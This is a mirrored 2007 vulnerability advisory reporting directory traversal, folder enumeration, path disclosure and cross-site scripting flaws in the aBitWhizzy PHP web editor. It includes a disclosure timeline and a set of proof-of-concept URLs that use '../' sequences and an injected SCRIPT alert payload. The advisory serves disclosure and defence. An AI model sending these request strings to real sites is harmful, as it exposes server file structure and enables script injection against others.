Lucene search

K

abitwhizzy-traverse.txt

πŸ—“οΈΒ 29 Mar 2007Β 00:00:00Reported byΒ LostmonTypeΒ 
packetstorm
Β packetstorm
πŸ”—Β packetstormsecurity.comπŸ‘Β 27Β Views

aBitWhizzy folder traversal and XSS vulnerabilit

Show more

5 of 5AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
`################################################  
aBitWhizzy traversal folder enumeration and XSS  
vendor url: http://www.unverse.net/abitwhizzy/  
Advisore:http://lostmon.blogspot.com/2007/03/  
abitwhizzy-traversal-folder-enumeration.html  
vendor notify:YES exploit include:YES  
################################################  
  
aBitWhizzy is a php script that uses whizzywig.js to create  
and edit web pages through a WYSIWYG interface, right through  
your browser. Now your site can be updated by people with no  
knowledge of HTML, FTP or AIG (Abbreviations In General).  
  
aBitWhizzy contains a flaw that allows a remote traversal  
arbitrary folder enumeration.This flaw exists because the  
application does not validate 'd' variable upon submission  
to 'whizzylink.php','whizzypic.php','whizzery/whizzypic.php' and  
'whizzery/whizzylink.php' scripts.This could allow a  
remote users to create a specially crafted URL that would  
execute '../' directory traversal characters to view folder  
structure on the target system with the privileges  
of the target web service.  
  
This input validation error permits too Cross-site scripting  
Style attacks and full path disclosure.  
  
###################  
VERSIONS  
###################  
  
Unknow version of aBitWhizzy  
  
##################  
SOLUTION  
##################  
  
No solutions was available at this time !!  
  
######################  
TIMELINE  
######################  
  
discovered:25-03-2007  
vendor notify:25-03-2007  
vendor response:---------  
Private Disclosure:25-03-2007  
public disclosure:27-03-2007  
  
#######################  
Examples  
#######################  
  
Path disclosure:  
  
http://localhost/abitwhizzy/whizzylink.php?d='  
http://localhost/abitwhizzy/whizzypic.php?d='  
http://localhost/abitwhizzy/whizzery/whizzypic.php?d='  
http://localhost/abitwhizzy/whizzery/whizzylink.php?d='  
  
Folder enumeration:  
  
  
http://localhost/abitwhizzy/whizzylink.php?d=  
../../../../../../../Documents%20and%20Settings  
  
http://localhost/abitwhizzy/whizzypic.php?d=  
../../../../../../../Documents%20and%20Settings  
  
http://localhost/abitwhizzy/whizzery/whizzypic.php?d=  
/../../../../../../../Documents%20and%20Settings  
  
http://localhost/abitwhizzy/whizzery/whizzylink.php?d=  
/../../../../../../../Documents%20and%20Settings  
  
  
Cross Site Scripting:  
  
http://localhost/abitwhizzy/whizzery/whizzypic.php?d=  
/../../../../../../../Documents%20and%20Settings  
"><SCRIPT>alert('XSS')</SCRIPT>  
  
  
http://localhost/abitwhizzy/whizzery/whizzylink.php?d=  
/../../../../../../../Documents%20and%20Settings  
"><SCRIPT>alert('XSS')</SCRIPT>  
  
  
http://localhost/abitwhizzy/whizzypic.php?d=  
../../../../../../../Documents%20and%20Settings  
"><SCRIPT>alert('XSS')</SCRIPT>  
  
  
http://localhost/abitwhizzy/whizzylink.php?d=  
../../../../../../../Documents%20and%20Settings  
"><SCRIPT>alert('XSS')</SCRIPT>  
  
  
########################### Β€nd ###################################  
  
Thnx to estrella Que te ailoviuu un monton ;P  
Thnx to all LostmonΒ΄s Group Team  
  
--  
atentamente:  
Lostmon ([email protected])  
Web-Blog: http://lostmon.blogspot.com/  
Google group: http://groups.google.com/group/lostmon (new)  
--  
La curiosidad es lo que hace mover la mente....  
  
  
  
--   
atentamente:  
Lostmon ([email protected])  
Web-Blog: http://lostmon.blogspot.com/  
Google group: http://groups.google.com/group/lostmon (new)  
--  
La curiosidad es lo que hace mover la mente....  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. ContactΒ us for a demo andΒ discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
29 Mar 2007 00:00Current
7.4High risk
Vulners AI Score7.4
27
.json
Report